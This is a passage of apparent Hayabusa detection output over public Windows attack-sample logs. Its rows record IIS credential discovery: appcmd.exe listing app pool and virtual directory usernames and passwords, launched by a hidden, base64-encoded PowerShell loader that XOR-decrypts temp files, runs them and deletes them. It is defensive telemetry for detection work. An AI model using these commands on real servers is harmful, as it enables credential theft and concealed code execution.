ABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQA